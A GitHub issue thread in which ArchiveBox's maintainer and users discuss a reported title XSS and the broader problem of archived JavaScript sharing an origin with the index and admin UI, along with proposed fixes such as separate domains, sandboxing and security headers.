-
-
Notifications
You must be signed in to change notification settings - Fork 1.2k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Architecture: Archived JS executes in a context shared with all other archived content (and the admin UI!) #239
Comments
I'm aware of this already, the reason I haven't immediately locked it down is because archived pages can already run arbitrary Javascript in the context of your archive domain, so there's not much we can do to protect against that attack vector without breaking interactivity across all archived pages. If I add bleach-style XSS stripping to titles it'll make the title page less likely to break from a UX perspective, but it doesn't make it any more secure because archived pages can just request the index page at any time directly using JavaScript. v0.4 is going to add some security headers that will make it more difficult for pages to use JS to access other archived pages, but it's never going to be perfect unless we have each archived page stored on its own domain. I'm having long conversations with several people this week about the security model of archivebox, it's a difficult problem but I think we'll have to end up disabling all Javascript in the static HTML archives and only allowing proxy replaying of WARCs if people want interactivity preserved. I'm going to move all the filesystem stuff in to hash-bucketed folders to discourage people from opening the saved html files directly and only accessing them via nginx or the django webserver, as allowing archived JS to have filesystem access is disastrously bad security. |
Because this is fairly serious I've temporarily striked-out the instructions for running archivebox with private data: https://github.com/pirate/ArchiveBox/wiki/Security-Overview#important-dont-use-archivebox-for-private-archived-content-right-now-as-were-in-the-middle-of-resolving-some-security-issues-with-how-js-is-executed-in-archived-content Unfortunately my day job is getting super busy right now so I don't know how soon I can change the design (fixing this is a big architectural change), but I think I might add a notice to the README as well to warn people that running archived pages can leak the index and content in the current state. The primary use case is archiving public pages and feeds so it's not as bad as if it were doing private session archiving by default, but I don't want to give users a false sense of security so we should definitely be transparent about the risks. |
Hi @pirate! I know the issue is not that critical when you're using archivebox only locally (like I do) cause you're aware of what you are doing (supposed at least) when you save pages and stuff like this but still I think that some people would be happy to know there's no random JS popping up in their hoarding box :) Thanks for your time & consideration. And for sure, thanks for this awesome tool. Cheers! |
Why does this only affect title? Is it possible that this XSS opportunity exists elsewhere? |
@andrewzigerelli see my comment above. A primary goal of ArchiveBox is to preserve JS and interactivity in archived pages, but that means pages necessarily have to be able to execute their own arbitrary JS. XSS-stripping titles or any of the other little metadata fields is like putting up a small picket fence to try and stop a tsunami. Why would an attacker bother going to the trouble to stuff some XSS payload in page titles when they can just put JS on the page directly knowing it will be executed by ArchiveBox users on a domain shared with the index and all the other pages? (the whole traditional browser security model breaks without CORS protections. the invisible wall that stops xxxhacker.com from accessing your data on facebook.com is the fact that it's on a different domain, but all archived pages are served from the same domain)
|
Idea h/t for encouragement from @FiloSottile, and similar to how Wikimedia and many other services do it:
These can be mapped to separate domains/ports (subdomains are dangerous?maybe, full domains likely required) by the user, but will require adding some new config options to tune what port/domain the admin and dirty content are listening on: e.g. This would close a pretty crucial security hole where archived content can mess with the execution of extractors (and potentially run abitrary shell scripts if they chain together a series of injection attacks). Semi-Related, using sandbox iframes for replay: https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe Extractor methods that replay JS:
Proposed behavior:
config option to enable bypassing sandboxing:
|
I talked about the ArchiveBox scenario with a couple experts, and we came up with a better option than This is much more robust and convenient than detecting iframe loads. We also went through the list of security headers to pick the ones that would protect ArchiveBox pages from Spectre, too. They should involve no maintenance.
On top of that, it would still be a good idea to have the admin API on a different origin (a different subdomain is enough), and make its cookie This should stop any cross-contamination between archived pages, but it won't stop them from detecting other archived pages. That might be possible, but it will require more complex server logic. |
Hi! Sorry to post on such an old issue, just wondering if this is going to be implemented? Would love to be able to use WARC instead of SingleFile |
Describe the bug
Hi there!
There's an XSS vulnerability when you open your index.html if you saved a page with a title containing an XSS vector.
Steps to reproduce
Source code:
Software versions
The text was updated successfully, but these errors were encountered: